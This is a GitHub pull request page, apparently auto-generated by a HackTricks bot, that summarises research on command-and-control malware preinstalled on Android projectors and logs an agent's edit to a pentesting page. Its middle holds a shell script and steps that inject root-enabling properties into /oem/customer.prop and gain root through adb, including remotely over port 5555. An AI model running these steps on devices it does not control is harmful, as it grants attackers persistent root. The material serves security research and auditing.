
Pre-installed C2 Infrastructure and RAT Payload on Android P...#2126

Open
carlospolop wants to merge 1 commit into master from update_Pre-installed_C2_Infrastructure_and_RAT_Payload_on_20260413_191539

Conversation

@carlospolop
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

  • Blog URL: https://github.com/Kavan00/Android-Projector-C2-Malware
  • Blog Title: Pre-installed C2 Infrastructure and RAT Payload on Android Projectors
  • Suggested Section: Mobile Pentesting -> Android Applications Pentesting (or a new page under Android: 'OEM/IoT Android Backdoors & Property Injection Root (customer.prop)') and optionally cross-link from Network Services Pentesting -> 5555 Android Debug Bridge (ADB) for the 'ADB over TCP unauth + adb root after property injection' angle

🎯 Content Summary

What this repo is
A technical security analysis (Apr 11–12, 2026) documenting a factory pre-installed command-and-control (C2) ecosystem on cheap Android projectors (supply-chain style; compared to “BADBOX”). The core finding is a preloaded “app store” system app that silently downloads/installs a hidden Remote Access Trojan (RAT), plus additional telemetry/ad modules, all with system-level privileges.

Affected devices / identification fingerprints
The analy...

🔧 Technical Details

Boot-time Android property injection to gain persistent root via ADB
If an Android device loads properties from an OEM-controlled file (e.g., /oem/customer.prop) at boot, and that partition is writable (e.g., FAT mounted with permissive masks such as fmask=0000) while SELinux is Permissive, an attacker can append properties like ro.debuggable=1, service.adb.root=1, and ro.secure=0, reboot, then use adb root to obtain uid=0. This converts a misconfiguration into a repeatable local/adjacent-network root backdoor (especially dangerous if ADB over TCP/5555 is exposed without auth).

Privileged “app store” system app as a dropper (manifest-driven silent install)
A preinstalled system app with INSTALL_PACKAGES can behave as a dropper by polling a vendor endpoint for a JSON manifest describing payload packages (pkg, encrypted pat...

🤖 Agent Actions

I’m mapping the repo first and locating existing Android/mobile pages that could absorb these techniques. Then I’ll read the closest matches and check for duplication before deciding whether any edit is justified.
The first pass shows a clear mobile-pentesting/android-app-pentesting area, plus likely overlap with ADB network-service content. I’m now reading Android and related pages directly to decide whether the new material belongs in an existing Android page or if the techniques are already covered elsewhere.
I’ve narrowed placement to the main Android pentesting page rather than creating a new file. That page already carries Android malware tradecraft and firmware/backdoor case studies, so I’m now validating the source material against existing HackTricks content to avoid adding duplicate or overly CVE-specific text.
The repo uses the release branch, not main, so I’m pulling the canonical README from there now. After that I’ll check exact insertion points in the Android page and patch only one file.
I’ve confirmed the content is additive and reusable rather than just a one-off malware report. I’m patching the Android main page now, keeping it concise: one new subsection for OEM Android system-app droppers and property-injection root backdoors, plus source links in the page’s existing references section.
Updated README.md in src/mobile-pentesting/android-app-pentesting/ as the best existing location. I did not create a new page because the reusable value here is Android malware tradecraft on OEM devices, not a device-specific CVE or product page.

The new content adds three technical patterns that were not already documented there: boot-time customer.prop property injection to turn exposed ADB into root, privileged system-app droppers driven by C2 manifests and pm install -r, and analyst workflow for C2-controlled anti-analysis using reverseLen byte reversal plus AES-CBC-hidden CDN paths. I also added the blog URL and the corroborating external analysis to the file’s ## References section at the end.

Verification: I re-read the modified section and checked the diff; the change is isolated to that single file and preserves the existing page structure.


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.
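The property-injection conditions summarised in the Technical Details above (OEM property file on a FAT partition mounted with fmask=0000, SELinux Permissive, ro.debuggable=1 / service.adb.root=1 / ro.secure=0 appended, reboot, adb root) can be checked and reproduced with a few shell functions. The block below is an added example written for this page; it is not code from the PR, from HackTricks or from the analysed repository. The property file and /proc/mounts lines it is tested against are constructed inline, and audit_device() is an assumption about how the same checks would be driven over adb against a real device (it assumes adb in PATH and one attached or TCP-connected device, and is not exercised offline).

```shell
# Added example (not from the original PR or repository): audit and reproduce
# the customer.prop property-injection root condition.

# Return 0 if the property file already carries one of the root-enabling
# properties named in the analysis: ro.debuggable=1, service.adb.root=1, ro.secure=0.
has_root_props() {
    grep -Eq '^[[:space:]]*(ro\.debuggable=1|service\.adb\.root=1|ro\.secure=0)[[:space:]]*$' "$1"
}

# Append the three properties (idempotently). init only reads the file at boot,
# so the device must be rebooted before "adb root" will succeed.
inject_root_props() {
    f="$1"
    for kv in ro.debuggable=1 service.adb.root=1 ro.secure=0; do
        grep -qx "$kv" "$f" 2>/dev/null || printf '%s\n' "$kv" >> "$f"
    done
}

# Return 0 if a /proc/mounts line is a FAT-family mount whose options contain
# fmask=0000, i.e. every file on it is world-writable from any shell user.
is_permissive_fat_mount() {
    printf '%s\n' "$1" | awk '
        $3 ~ /^(v?fat|msdos|exfat)$/ && ("," $4 ",") ~ /,fmask=0000,/ { found = 1 }
        END { exit !found }'
}

# Assumed adb-driven version of the checks above; not run by the offline test.
# Pulls /oem/customer.prop into customer.prop.bak so the original is preserved.
audit_device() {
    echo "SELinux: $(adb shell getenforce)"
    adb shell cat /proc/mounts | while IFS= read -r line; do
        is_permissive_fat_mount "$line" && echo "world-writable FAT mount: $line"
    done
    adb shell cat /oem/customer.prop > customer.prop.bak 2>/dev/null || return 1
    if has_root_props customer.prop.bak; then
        echo "root-enabling properties already present in /oem/customer.prop"
    fi
}
```

A device that reports SELinux Permissive, a fmask=0000 FAT mount at /oem and a writable customer.prop meets all the preconditions; after inject_root_props on the pulled file is pushed back and the device rebooted, `adb root` followed by `adb shell id` should return uid=0. If port 5555 is reachable on the network, `adb connect <host>:5555` gives the same path to an unauthenticated remote attacker, which is the cross-link to the ADB page the PR suggests.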

@carlospolop
Collaborator Author

🔗 Additional Context

Original Blog Post: https://github.com/Kavan00/Android-Projector-C2-Malware

Content Categories: Based on the analysis, this content was categorized under "Mobile Pentesting -> Android Applications Pentesting (or a new page under Android: 'OEM/IoT Android Backdoors & Property Injection Root (customer.prop)') and optionally cross-link from Network Services Pentesting -> 5555 Android Debug Bridge (ADB) for the 'ADB over TCP unauth + adb root after property injection' angle".

Repository Maintenance:

  • MD Files Formatting: 972 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0
